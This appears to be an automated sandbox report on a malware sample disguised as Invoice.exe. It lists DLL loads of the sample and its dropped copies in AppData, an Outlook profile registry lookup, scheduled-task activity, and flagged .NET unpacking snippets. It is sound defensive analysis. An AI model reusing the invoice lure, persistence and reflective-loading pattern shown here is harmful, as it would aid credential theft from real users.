Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Invoice.exe.3e59970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: Invoice.exe, Customer.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: kaJNzBnxbXm.exe.0.dr, Customer.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, jGxU6uLS0cTcaSem1E.cs	.Net Code: ipEhuIO7wR System.Reflection.Assembly.Load(byte[])
